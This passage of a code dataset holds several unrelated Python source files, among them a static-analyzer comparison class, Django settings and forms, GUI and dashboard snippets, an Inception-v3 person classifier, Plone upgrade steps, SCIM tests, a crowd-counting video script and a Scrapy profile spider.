self.search_entities_in_lines(c, found_lines, result_set)\n\n def present_entity_uses(self, node, lines_list, variable_set):\n if node.kind == clang.cindex.CursorKind.VAR_DECL or \\\n node.kind == clang.cindex.CursorKind.DECL_REF_EXPR:\n if node.location.line in lines_list:\n if str(node.displayname) in variable_set:\n return True\n for c in node.get_children():\n if self.present_entity_uses(c, lines_list, variable_set):\n return True\n return False\n\n def analyze_comparison_buffer_overflow(self):\n\n if not self.check_both_FileInfo_format():\n return -1\n\n list_buf_overflow_types_an1 = type_groups[self.analyzer1_info.analyzer_name][\"Buffer_overflow\"]\n list_buf_overflow_types_an2 = type_groups[self.analyzer2_info.analyzer_name][\"Buffer_overflow\"]\n\n analyzer1_info_res = AnalyzerInfo(analyzer_name=self.analyzer1_info.analyzer_name,\n info_type=self.analyzer1_info.info_type)\n analyzer2_info_res = AnalyzerInfo(analyzer_name=self.analyzer2_info.analyzer_name,\n info_type=self.analyzer2_info.info_type)\n\n def analyze_comparison_buffer_overflow_old(self):\n\n list_buf_overflow_types_an1 = type_groups[self.analyzer1_info.analyzer_name][\"Buffer_overflow\"]\n list_buf_overflow_types_an2 = type_groups[self.analyzer2_info.analyzer_name][\"Buffer_overflow\"]\n\n found_corresponding_er_both_an1 = np.zeros((len(self.error_list_an1)), dtype=np.bool)\n found_corresponding_er_both_an2 = np.zeros((len(self.error_list_an2)), dtype=np.bool)\n\n error_list_an1_res = []\n error_list_an2_res = []\n error_list_both_res = []\n\n for found_error_an1 in self.error_list_both:\n if found_error_an1[3] in list_buf_overflow_types_an1:\n found_filename = found_error_an1[0]\n found_lines = found_error_an1[1]\n\n same_file_error_ind_list_an1 = []\n 
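# --- Editor's usage sketch (hedged): how search_entities_in_lines above is typically
# driven. Requires libclang to be installed; depending on the setup you may first need
# clang.cindex.Config.set_library_file(...). The file name and line numbers are
# placeholders, not taken from this project.
import clang.cindex

def collect_names(node, lines, out):
    # Recursively collect VAR_DECL / DECL_REF_EXPR spellings on the given lines,
    # mirroring the traversal in search_entities_in_lines.
    if node.kind in (clang.cindex.CursorKind.VAR_DECL,
                     clang.cindex.CursorKind.DECL_REF_EXPR):
        if node.location.line in lines:
            out.add(str(node.displayname))
    for child in node.get_children():
        collect_names(child, lines, out)

index = clang.cindex.Index.create()
tu = index.parse("example.cpp", args=["-std=c++17"])
names = set()
collect_names(tu.cursor, [10, 11, 12], names)
print(names)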
same_file_error_list_an1 = []\n\n                same_file_error_ind_list_an2 = []\n                same_file_error_list_an2 = []\n\n                for unfound_error_an1_ind in range(len(self.error_list_an1)):\n                    if self.error_list_an1[unfound_error_an1_ind][0] == found_filename and \\\n                            self.error_list_an1[unfound_error_an1_ind][2] in list_buf_overflow_types_an1:\n                        same_file_error_ind_list_an1.append(unfound_error_an1_ind)\n                        same_file_error_list_an1.append(self.error_list_an1[unfound_error_an1_ind])\n\n                for unfound_error_an2_ind in range(len(self.error_list_an2)):\n                    if self.error_list_an2[unfound_error_an2_ind][0] == found_filename and \\\n                            self.error_list_an2[unfound_error_an2_ind][2] in list_buf_overflow_types_an2:\n                        same_file_error_ind_list_an2.append(unfound_error_an2_ind)\n                        same_file_error_list_an2.append(self.error_list_an2[unfound_error_an2_ind])\n\n                index = clang.cindex.Index.create()\n                translation_unit = index.parse(found_filename, args=[\"-std=c++17\"])\n                cursor = translation_unit.cursor\n\n                variable_set = set()\n                self.search_entities_in_lines(cursor, found_lines, variable_set)\n\n                for er_ind in range(len(same_file_error_list_an1)):\n                    if self.present_entity_uses(cursor, same_file_error_list_an1[er_ind][1], variable_set):\n\n                        error_name1 = same_file_error_list_an1[er_ind][2]\n                        error_name2 = found_error_an1[4]\n\n                        ind1 = srch_list_ind(self.name_catalog_an1, error_name1)\n                        ind2 = srch_list_ind(self.name_catalog_an2, error_name2)\n\n                        if not found_corresponding_er_both_an1[same_file_error_ind_list_an1[er_ind]]:\n                            self.stat_matrix[ind1][-2] -= 1\n                            found_corresponding_er_both_an1[same_file_error_ind_list_an1[er_ind]] = True\n\n                        self.stat_matrix[ind1][ind2] += 1\n\n                        error_list_both_res.append([found_filename,\n                                                    same_file_error_list_an1[er_ind][1],\n                                                    found_error_an1[2],\n                                                    error_name1,\n                                                    error_name2])\n\n                for er_ind in range(len(same_file_error_list_an2)):\n                    if self.present_entity_uses(cursor, same_file_error_list_an2[er_ind][1], variable_set):\n\n                        error_name1 = found_error_an1[3]\n                        error_name2 = same_file_error_list_an2[er_ind][2]\n\n                        ind1 = srch_list_ind(self.name_catalog_an1, error_name1)\n                        ind2 = srch_list_ind(self.name_catalog_an2, error_name2)\n\n                        if not found_corresponding_er_both_an2[same_file_error_ind_list_an2[er_ind]]:\n                            self.stat_matrix[-2][ind2] -= 1\n                            found_corresponding_er_both_an2[same_file_error_ind_list_an2[er_ind]] = True\n\n                        self.stat_matrix[ind1][ind2] += 1\n\n                        error_list_both_res.append([found_filename,\n                                                    found_error_an1[1],\n                                                    same_file_error_list_an2[er_ind][1],\n                                                    error_name1,\n                                                    error_name2])\n\n        for error_an1_ind in range(len(self.error_list_an1)):\n            if not found_corresponding_er_both_an1[error_an1_ind]:\n                error_list_an1_res.append(self.error_list_an1[error_an1_ind])\n\n        for error_an2_ind in range(len(self.error_list_an2)):\n            if not found_corresponding_er_both_an2[error_an2_ind]:\n                error_list_an2_res.append(self.error_list_an2[error_an2_ind])\n\n        self.error_list_an1 = error_list_an1_res\n        self.error_list_an2 = error_list_an2_res\n        self.error_list_both = error_list_both_res\n\n        return\n\n\n","sub_path":"projectLib/Classes/Comparison.py","file_name":"Comparison.py","file_ext":"py","file_size_in_byte":27962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"537231116","text":"#A string is said to be beautiful if b occurs in it no more times than a; c occurs in it no more times than b; etc.\n\n#Given a string, check whether it is beautiful.\n\n#For inputString = \"bbbaacdafe\", the output should be\n#isBeautifulString(inputString) = true;\n#For inputString = 
\"aabbb\", the output should be\n#isBeautifulString(inputString) = false;\n#For inputString = \"bbc\", the output should be\n#isBeautifulString(inputString) = false.\n\ndef isBeautifulString(inputString):\n chr = sorted(set(inputString))\n if chr[0] != 'a':\n return False\n count = inputString.count(chr[0])\n for i in range(len(chr)-1):\n if (ord(chr[i+1])-ord(chr[i]) != 1):\n return False\n for i in range(len(chr)):\n if (inputString.count(chr[i]) > count):\n return False\n else:\n count = inputString.count(chr[i])\n return True\n\n#print(isBeautifulString(\"bbc\"))\n#isBeautifulString(\"aabbb\")\n#print(isBeautifulString(\"bbbaacdafe\"))\nprint(isBeautifulString(\"aabbb\"))","sub_path":"Arcade/Intro/isBeautifulString.py","file_name":"isBeautifulString.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"27653824","text":"import os\n\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nPROJECT_ROOT = os.path.abspath(os.path.dirname(BASE_DIR))\n\nADMINS = (('Joshua Chandler', 'joshchandler88@gmail.com'),)\n\nALLOWED_HOSTS = ['*']\n\nSITE_ID = 1\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.sites',\n 'django.contrib.staticfiles',\n 'django_extensions',\n \n # Third Party Apps,\n 'rest_framework',\n 'rest_framework.authtoken',\n \n # Project Apps\n 'api.registration',\n 'api.user',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n)\n\nTEMPLATE_DIRS = (\n os.path.join(BASE_DIR, 'templates'),\n)\n\nROOT_URLCONF = 'api.urls'\n\nWSGI_APPLICATION = 'api.wsgi.application'\n\n# INTERNATIONALIZATION\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'UTC'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\n# REGISTRATION\nACCOUNT_ACTIVATION_DAYS = 7\nREGISTRATION_DEFAULT_FROM_EMAIL = 'registration@email.com'\nREGISTRATION_EMAIL_HTML = True\n","sub_path":"api/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"89833073","text":"import wx\r\n\r\nclass CheckBoxFrame(wx.Frame):\r\n def __init__(self):\r\n wx.Frame.__init__(self, None, -1, 'Checkbox Example', \r\n size=(200, 300))\r\n panel = wx.Panel(self, -1)\r\n self.cb1 = wx.CheckBox(panel, -1, \"Alpha\", (35, 40), (150, 20), name=\"Alpha\")\r\n self.cb2 = wx.CheckBox(panel, -1, \"Beta\", (35, 60), (150, 20), name=\"Beta\")\r\n self.cb3 = wx.CheckBox(panel, -1, \"Gamma\", (35, 80), (150, 20), name=\"Gamma\")\r\n \r\n self.cb1.Bind(wx.EVT_CHECKBOX, self.OnChecked)\r\n self.cb2.Bind(wx.EVT_CHECKBOX, self.OnChecked)\r\n self.cb3.Bind(wx.EVT_CHECKBOX, self.OnChecked)\r\n \r\n self.text = []\r\n \r\n self.staticText = wx.StaticText(panel, -1, \"Checked\", (35, 120))\r\n self.basicText = wx.TextCtrl(panel, -1, \"\", pos = (35, 140), size=(100, 20))\r\n self.basicText.SetInsertionPoint(0)\r\n\r\n def OnChecked(self, event):\r\n cb = event.GetEventObject()\r\n if 
cb.GetValue():\r\n self.text.append(cb.GetName())\r\n else:\r\n if cb.GetName() in self.text:\r\n self.text.remove(cb.GetName())\r\n self.basicText.SetValue(' '.join(sorted(self.text)))\r\n \r\n def OnChecked1(self, event):\r\n if self.cb1.GetValue():\r\n self.text.append(\"Alpha\")\r\n else:\r\n if \"Alpha\" in self.text:\r\n self.text.remove(\"Alpha\")\r\n self.basicText.SetValue(' '.join(sorted(self.text)))\r\n \r\n def OnChecked2(self, event):\r\n if self.cb2.GetValue():\r\n self.text.append(\"Beta\")\r\n else:\r\n if \"Beta\" in self.text:\r\n self.text.remove(\"Beta\")\r\n self.basicText.SetValue(' '.join(sorted(self.text)))\r\n\r\n def OnChecked3(self, event):\r\n if self.cb3.GetValue():\r\n self.text.append(\"Gamma\")\r\n else:\r\n if \"Gamma\" in self.text:\r\n self.text.remove(\"Gamma\")\r\n self.basicText.SetValue(' '.join(sorted(self.text)))\r\n \r\n \r\nif __name__ == '__main__':\r\n app = wx.PySimpleApp()\r\n CheckBoxFrame().Show()\r\n app.MainLoop() \r\n\r\n","sub_path":"wxPython/wxPIA_book/Chapter-07/checkbox.py","file_name":"checkbox.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"9769640","text":"import dash_html_components as html\nimport dash_core_components as dcc\n\ndef Header():\n return html.Div([\n get_logo(),\n get_header(\"Company A\"),\n html.Br([]),\n get_menu()\n ])\n\ndef get_logo():\n logo = html.Div([\n\n html.Div([\n html.Img(src='https://static-www.rms.com/assets/blt4a6ddacca47281bf/lg-logo-rms.svg?q=123', height='80', width='80')\n ], className=\"ten columns padded\"),\n\n # html.Div([\n # dcc.Link('Full View ', href='/report/full-view')\n # ], className=\"two columns page-view no-print\")\n\n ], className=\"row gs-header\")\n return logo\n\n\ndef get_header(company_name):\n header = html.Div([\n\n html.Div([\n html.H5(\n company_name)\n ], className=\"twelve columns padded\")\n\n ], className=\"row gs-header gs-text-header\")\n return header\n\n\ndef get_menu():\n menu = html.Div([\n\n dcc.Link('Overview ', href='/overview', className=\"tab first\"),\n\n dcc.Link('Exposure Summary ', href='/exposure-summary', className=\"tab\"),\n\n dcc.Link('EP curves ', href='/ep-curves', className=\"tab\"),\n\n # dcc.Link('Portfolio Impact ', href='/portfolio-impact', className=\"tab\"),\n\n ], className=\"row \")\n return menu","sub_path":"components/header.py","file_name":"header.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"37916991","text":"from django import forms\nfrom .models import Document, Appointment\n\n\nclass DocumentForm(forms.ModelForm):\n class Meta:\n model = Document\n fields = ('document',)\n\nsymptlist = []\nfor i in Appointment.objects.all():\n symptlist.append((i.symptom, i.symptom))\nnewsymptlist = list(dict.fromkeys(symptlist))\n\n\nclass Symptom(forms.Form):\n symptom = forms.ChoiceField(choices=newsymptlist, label=\"Enter Symptom\")\n\n\ndiaglist = []\nfor i in Appointment.objects.all():\n diaglist.append((i.diagnosis, i.diagnosis))\nnewdiaglist = list(dict.fromkeys(diaglist))\n\n\nclass Diagnosis(forms.Form):\n diag = forms.ChoiceField(choices=newdiaglist, label=\"Enter Diagnosis\")\n\n\nReportchoice = [('General Date', 'General Date'), ('General Symptoms', 'General Symptoms'),\n ('General Diagnosis', 'General Diagnosis'), ('Specific Symptom', 'Specific Symptom'),\n ('Specific Diagnosis', 'Specific Diagnosis')]\n\ndlist = []\nfor i in 
Appointment.objects.all():\n dlist.append((i.date[:10], i.date[:10]))\nnewdatelist = list(dict.fromkeys(dlist))\n\n\nclass Report(forms.Form):\n report = forms.ChoiceField(choices=Reportchoice, label=\"Report Type\")\n startdate = forms.CharField( label=\"Start Date\", max_length=10)\n enddate = forms.CharField(label=\"End Date\", max_length=10)\n","sub_path":"medproc/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"643316342","text":"from __future__ import division, print_function, unicode_literals\nimport os\nimport cv2\nfrom collections import defaultdict\nfrom scipy.misc import imresize\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.contrib.slim.nets import inception\nimport tensorflow.contrib.slim as slim\nfrom random import sample\n\n\nwidth = 299\nheight = 299\nchannels = 3\nINCEPTION_PATH = os.path.join(\"datasets\", \"inception\")\nINCEPTION_V3_CHECKPOINT_PATH = os.path.join(INCEPTION_PATH, \"inception_v3.ckpt\")\n\n# Get all the images as dictionary\nPERSON_PATH = os.path.join(\"datasets\", \"person\")\nperson_root_path = os.path.join(PERSON_PATH, \"person_photos\")\nperson_classes=os.listdir(person_root_path)\nimage_paths = defaultdict(list)\n\nfor person_class in person_classes:\n image_dir = os.path.join(person_root_path, person_class)\n for filepath in os.listdir(image_dir):\n if filepath.endswith(\".jpg\") or filepath.endswith(\".png\"):\n image_paths[person_class].append(os.path.join(image_dir, filepath))\n \nfor paths in image_paths.values():\n paths.sort() \n \n\ndef prepare_image(example_image):\n image = imresize(example_image, (width, height)) \n return image.astype(np.float32)/255 \n\ntf.reset_default_graph()\n\nX = tf.placeholder(tf.float32, shape=[None, height, width, channels], name=\"X\")\ntraining = tf.placeholder_with_default(False, shape=[])\n\nwith slim.arg_scope(inception.inception_v3_arg_scope()):\n logits, end_points = inception.inception_v3(X, num_classes=1001, is_training=training)\n\ninception_saver = tf.train.Saver()\n\nprelogits = tf.squeeze(end_points[\"PreLogits\"], axis=[1, 2])\n\nn_outputs = len(person_classes)\n\nwith tf.name_scope(\"new_output_layer\"):\n person_logits = tf.layers.dense(prelogits, n_outputs, name=\"person_logits\")\n Y_proba = tf.nn.softmax(person_logits, name=\"Y_proba\")\n \ny = tf.placeholder(tf.int32, shape=[None])\n\n\nwith tf.name_scope(\"train\"):\n xentropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=person_logits, labels=y)\n loss = tf.reduce_mean(xentropy)\n optimizer = tf.train.AdamOptimizer()\n flower_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=\"person_logits\")\n training_op = optimizer.minimize(loss, var_list=flower_vars)\n \nwith tf.name_scope(\"eval\"):\n correct = tf.nn.in_top_k(person_logits, y, 1)\n accuracy = tf.reduce_mean(tf.cast(correct, tf.float32))\n \nwith tf.name_scope(\"init_and_save\"):\n init = tf.global_variables_initializer()\n saver = tf.train.Saver()\n\nperson_class_ids = {flower_class: index for index, flower_class in enumerate(person_classes)}\nprint(person_class_ids) \n\nperson_paths_and_classes = []\nfor person_class, paths in image_paths.items():\n for path in paths:\n person_paths_and_classes.append((path, person_class_ids[person_class])) \n \ntest_ratio = 0.2\ntrain_size = int(len(person_paths_and_classes) * (1 - test_ratio))\n\nnp.random.shuffle(person_paths_and_classes)\n\nperson_paths_and_classes_train = 
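# --- Editor's note as a sketch (hedged): the forms above build their choice lists at
# import time, so symptoms/diagnoses added after the process starts never appear, and
# the database is queried during import. Rebuilding the choices in __init__ re-queries
# per form instantiation. This variant is an assumption about intent, not code from
# the original file.
from django import forms

class SymptomForm(forms.Form):
    symptom = forms.ChoiceField(choices=(), label="Enter Symptom")

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Imported lazily so the query runs at request time, not import time.
        from .models import Appointment
        seen = dict.fromkeys(a.symptom for a in Appointment.objects.all())
        self.fields["symptom"].choices = [(s, s) for s in seen]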
person_paths_and_classes[:train_size]\nperson_paths_and_classes_test = person_paths_and_classes[train_size:]\n\ndef prepare_batch(person_paths_and_classes, batch_size):\n batch_paths_and_classes = sample(person_paths_and_classes, batch_size)\n images = []\n for path, labels in batch_paths_and_classes:\n if(cv2.imread(path) is not None):\n images.append(cv2.imread(path)[:, :, :channels])\n prepared_images = [prepare_image(image) for image in images]\n X_batch = 2 * np.stack(prepared_images) - 1 # Inception expects colors ranging from -1 to 1\n y_batch = np.array([labels for path, labels in batch_paths_and_classes], dtype=np.int32)\n return X_batch, y_batch \n\nX_batch, y_batch = prepare_batch(person_paths_and_classes_train, batch_size=4)\nprint(X_batch.shape,y_batch.shape,X_batch.dtype,y_batch.dtype) \n\nX_test, y_test = prepare_batch(person_paths_and_classes_test, batch_size=len(person_paths_and_classes_test))\n\n# Training of Inception_v3 on Human Dataset uncomment below lines for training and comment lines below Testing step \n\nn_epochs = 50\nbatch_size = 40\nn_iterations_per_epoch = len(person_paths_and_classes_train) // batch_size\n'''\nwith tf.Session() as sess:\n init.run()\n inception_saver.restore(sess, INCEPTION_V3_CHECKPOINT_PATH)\n\n for epoch in range(n_epochs):\n print(\"Epoch\", epoch, end=\"\")\n for iteration in range(n_iterations_per_epoch):\n print(\".\", end=\"\")\n X_batch, y_batch = prepare_batch(person_paths_and_classes_train, batch_size)\n sess.run(training_op, feed_dict={X: X_batch, y: y_batch, training: True})\n\n acc_train = accuracy.eval(feed_dict={X: X_batch, y: y_batch})\n print(\" Train accuracy:\", acc_train)\n\n save_path = saver.save(sess, \"./human_classification_checkpoints/person_model\"+str(acc_train)+\".ckpt\")\n\n '''\n# Testing the trained model and accuracy is 98% \n\nn_test_batches = 10\nX_test_batches = np.array_split(X_test, n_test_batches)\ny_test_batches = np.array_split(y_test, n_test_batches)\n\nwith tf.Session() as sess:\n saver.restore(sess, \"./human_classification_checkpoints/person_model1.0.ckpt\")\n\n print(\"Computing final accuracy on the test set (this will take a while)...\")\n acc_test = np.mean([\n accuracy.eval(feed_dict={X: X_test_batch, y: y_test_batch})\n for X_test_batch, y_test_batch in zip(X_test_batches, y_test_batches)])\n print(\"Test accuracy:\", acc_test) \n \n","sub_path":"human_classification.py","file_name":"human_classification.py","file_ext":"py","file_size_in_byte":5431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"589258697","text":"# encoding: utf-8\n# Copyright 2013–2017 California Institute of Technology. ALL RIGHTS\n# RESERVED. U.S. 
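# --- Editor's sketch (hedged): in prepare_batch above, y_batch is built from every
# sampled path even when cv2.imread fails and the image is skipped, so X_batch and
# y_batch can fall out of step. A defensive variant that keeps image/label pairs
# together (assumes the same prepare_image, channels, sample, cv2 and np from this
# module):
def prepare_batch_safe(paths_and_classes, batch_size):
    batch = sample(paths_and_classes, batch_size)
    images, labels = [], []
    for path, label in batch:
        img = cv2.imread(path)
        if img is None:          # unreadable file: drop the image AND its label
            continue
        images.append(prepare_image(img[:, :, :channels]))
        labels.append(label)
    X_batch = 2 * np.stack(images) - 1   # Inception expects colors in [-1, 1]
    y_batch = np.array(labels, dtype=np.int32)
    return X_batch, y_batch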
Government Sponsorship acknowledged.\n\nfrom .setuphandlers import publish\nfrom edrn.rdf import DEFAULT_PROFILE\nfrom plone.dexterity.utils import createContentInContainer\nfrom edrn.rdf.labcascollectionrdfgenerator import ILabCASCollectionRDFGenerator\nimport plone.api\n\n\ndef nullUpgradeStep(setupTool):\n '''A null step when a profile upgrade requires no custom activity.'''\n\n\ndef upgrade3to4(setupTool):\n setupTool.runImportStepFromProfile(DEFAULT_PROFILE, 'typeinfo')\n\n\ndef upgrade4to5(setupTool):\n # Note that I (kelly) went ahead and added these through the web to the\n # running https://edrn.jpl.nasa.gov/cancerdataexpo/ so we could take\n # immediate advantage of the new data without cutting a new release.\n # This is provided just in case there is a disaster and we need to\n # re-release.\n portal = setupTool.getSite()\n if 'rdf-generators' in list(portal.keys()):\n rdfGenerators = portal['rdf-generators']\n if 'person-generator' in list(rdfGenerators.keys()):\n personGenerator = rdfGenerators['person-generator']\n if 'staff_status' not in list(personGenerator.keys()):\n predicate = createContentInContainer(\n personGenerator,\n 'edrn.rdf.literalpredicatehandler',\n title='Staff_Status',\n description='''Maps from DMCC's Staff_Status to the EDRN-specific predicate for employmentActive.''',\n predicateURI='http://edrn.nci.nih.gov/rdf/schema.rdf#employmentActive'\n )\n publish(predicate, plone.api.portal.get_tool('portal_workflow'))\n if 'publications-generator' in list(rdfGenerators.keys()):\n publicationsGenerator = rdfGenerators['publications-generator']\n if 'siteid' not in list(publicationsGenerator.keys()):\n predicate = createContentInContainer(\n publicationsGenerator,\n 'edrn.rdf.referencepredicatehandler',\n title='SiteID',\n description='''Maps from the DMCC's SiteID to the EDRN-specific predicate for site ID.''',\n predicateURI='http://edrn.nci.nih.gov/rdf/schema.rdf#site',\n uriPrefix='http://edrn.nci.nih.gov/data/sites/'\n )\n publish(predicate, plone.api.portal.get_tool('portal_workflow'))\n\n\ndef upgrade5to6(setupTool):\n catalog = plone.api.portal.get_tool('portal_catalog')\n for brain in catalog(object_provides=ILabCASCollectionRDFGenerator.__identifier__):\n obj = brain.getObject()\n obj.labcasSolrURL = 'https://edrn-labcas.jpl.nasa.gov/data-access-api'\n","sub_path":"src/edrn.rdf/edrn/rdf/upgrades.py","file_name":"upgrades.py","file_ext":"py","file_size_in_byte":2788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"491120864","text":"# -*- coding: utf-8 -*-\nfrom dataclasses import asdict\nfrom datetime import datetime\nfrom unittest import TestCase\nfrom uuid import uuid4\n\nfrom bson import ObjectId\nfrom marshmallow_dataclass import class_schema\n\nfrom eduid_userdb.testing import normalised_data\n\nfrom eduid_scimapi.schemas.scimbase import BaseResponse, Meta, SCIMResourceType, SCIMSchema, SubResource\n\n__author__ = 'lundberg'\n\n\nclass TestScimBase(TestCase):\n def test_meta(self) -> None:\n meta = Meta(\n location='http://example.org/group/some-id',\n resource_type=SCIMResourceType.GROUP,\n created=datetime.utcnow(),\n last_modified=datetime.utcnow(),\n version=ObjectId(),\n )\n schema = class_schema(Meta)\n meta_dump = schema().dump(meta)\n loaded_meta = schema().load(meta_dump)\n assert normalised_data(asdict(meta)) == normalised_data(asdict(loaded_meta))\n\n def test_base_response(self) -> None:\n meta = Meta(\n location='http://example.org/group/some-id',\n 
resource_type=SCIMResourceType.GROUP,\n            created=datetime.utcnow(),\n            last_modified=datetime.utcnow(),\n            version=ObjectId(),\n        )\n        base = BaseResponse(id=uuid4(), schemas=[SCIMSchema.CORE_20_USER, SCIMSchema.CORE_20_GROUP], meta=meta)\n        schema = class_schema(BaseResponse)\n        base_dump = schema().dump(base)\n        loaded_base = schema().load(base_dump)\n        assert normalised_data(asdict(base)) == normalised_data(asdict(loaded_base))\n\n    def test_hashable_subresources(self):\n        a = {\n            '$ref': 'http://localhost:8000/Users/78130160-b63d-4303-99cd-73767e2a999f',\n            'display': 'Test User 1 (updated)',\n            'value': '78130160-b63d-4303-99cd-73767e2a999f',\n        }\n        b = {\n            '$ref': 'http://localhost:8000/Groups/f194099c-23a9-4046-8cd6-79e472476fd2',\n            'display': 'Test Group 2 (also updated)',\n            'value': 'f194099c-23a9-4046-8cd6-79e472476fd2',\n        }\n        res_a = SubResource.from_mapping(a)\n        res_b = SubResource.from_mapping(b)\n        self.assertNotEqual(res_a, res_b)\n\n        res_set = {res_a, res_b}\n        self.assertIsInstance(res_set, set)\n","sub_path":"src/eduid_scimapi/tests/test_scimbase.py","file_name":"test_scimbase.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"488850552","text":"import cv2\nfrom keras.models import *\nfrom data_process_before_train import learning_rate_type\nfrom data_process_before_train import adjust_brightness_contrast\nimport numpy as np\nimport sys\nimport time\nimport os\n\n\"\"\"Force CPU-only execution\"\"\"\n# os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"\"\n\n\"\"\"---------------Load the model--------------------\"\"\"\nmodel_name = 'hongqiao'\ndata_type = 5\nlearning_rate = 0.00001\nlr_m, lr_index = learning_rate_type(learning_rate)\nbatch_size = 1\nepoch = 50\n\nnew_model=load_model('saved_models/{}_dt{}_lr{}e{}_bs{}_ep{}'\n                     '.h5'.format(model_name, data_type, lr_m, lr_index, batch_size, epoch))\n\n\"\"\"----------------Read in the video-----------------\"\"\"\n# video_path='../../../video/videos1/vid0.ts'\nvideo_path = sys.argv[1]\nbrighten = int(sys.argv[2])  # 0 means do not brighten, 1 means brighten\ncap = cv2.VideoCapture()\ncap.open(video_path)\n\n\"\"\"---------------Process the video frames-----------------\"\"\"\n# Set the frame interval between updates; tuned against the processing time, it gives a smooth display\nframe_interval = 15\n# Get the total number of frames in the video\ntotal_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\nprint(\"total frame:\", total_frames)\n\n# Analyze the video\nnum_people = 0\ntime_last = time.time()\nfor i in range(total_frames):\n    _, frame = cap.read()\n    # Adjust the brightness\n    if brighten == 1:\n        frame=adjust_brightness_contrast(frame,1.5,+50)\n\n    # Refresh the people count every frame_interval frames\n    if (i + 1) % frame_interval == 0:\n        time_start = time.time()\n        image = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)\n        image = cv2.resize(image, (480, 300))\n\n        image[0:35, :] = 0\n        image = image / 255\n        # image = (image - 127.5) / 128\n        image_input = np.reshape(image, (1, image.shape[0], image.shape[1], 1))\n        density_map = new_model.predict(image_input)\n        num_people = np.round(np.sum(density_map))\n\n        # Save the density map\n        density_map = np.reshape(density_map, (density_map.shape[1], density_map.shape[2]))\n        density_map_image = density_map / np.max(density_map) * 255 * 10\n        density_map_image = density_map_image.astype(\"uint8\")\n        density_map_image = cv2.resize(density_map_image, (density_map_image.shape[1] * 2,\n                                                           density_map_image.shape[0] * 2))\n        cv2.imshow('density_map', density_map_image)\n        cv2.imwrite('../density_map/den_{:0>5d}.jpg'.format(i), density_map)\n        # time_now = time.time()\n        # used_time=time_now-time_last\n        # time_last=time_now\n        time_end = time.time()\n        used_time = time_end - 
time_start\n        print(\"used time for an update:\", used_time)\n\n        cv2.waitKey(19950731)\n\n    # frame[0:180, :] = 0\n    frame = cv2.resize(frame, (1400, 900))\n    # Write the people count onto the frame\n    cv2.putText(frame, \"num_people:{}\".format(num_people),\n                (75, 75), cv2.FONT_HERSHEY_SIMPLEX, 3, (0, 0, 255), 3)\n    cv2.imshow('video', frame)\n\n    if cv2.waitKey(1) == 27:\n        break\n\n# Release the capture\ncap.release()\n","sub_path":"video_test.py","file_name":"video_test.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"40471948","text":"import scrapy\n\nfrom ICE_spider_EXP1.items import UserItem\n\nclass UserSpider(scrapy.Spider):\n    name = 'users'\n\n    def start_requests(self):\n        top10_url = 'https://segmentfault.com/users'\n        yield scrapy.Request(url=top10_url, callback=self.parse_top10)\n\n    def parse_top10(self,response):\n        users = response.xpath(\"//div[@class='d-flex align-items-center']/a[2]\")\n\n        for user in users:\n            user_item = UserItem()\n\n            user_item['username'] = user.xpath('@href').get().split('/')[2]\n            user_item['nickname'] = user.xpath('span/text()').get()\n\n            # yield user_item\n\n            profile_url = 'https://segmentfault.com/u/'+user_item['username']\n            yield scrapy.Request(url=profile_url, callback=self.parse_profile, meta={'hero_item': user_item['username']})\n    \n    def parse_profile(self,response):\n        user_itemAll = UserItem()\n        item = response.meta.get('hero_item')\n        user_itemAll['username'] = item\n        user_itemAll['nickname'] = response.xpath('//*[@id=\"root\"]/div[4]/div/div[1]/div[1]/div/div[2]/h3/text()').get()\n        user_itemAll['like'] = response.xpath('//*[@id=\"root\"]/div[4]/div/div[1]/div[1]/div/div[2]/div[1]/div[2]/strong/text()').get()\n        user_itemAll['fans'] = response.xpath('//*[@id=\"root\"]/div[4]/div/div[1]/div[1]/div/div[2]/div[1]/div[3]/strong/text()').get()\n        user_itemAll['prestige'] = response.xpath('//*[@id=\"root\"]/div[4]/div/div[1]/div[1]/div/div[2]/div[1]/div[1]/a/strong/text()').get()\n        user_itemAll['location'] = 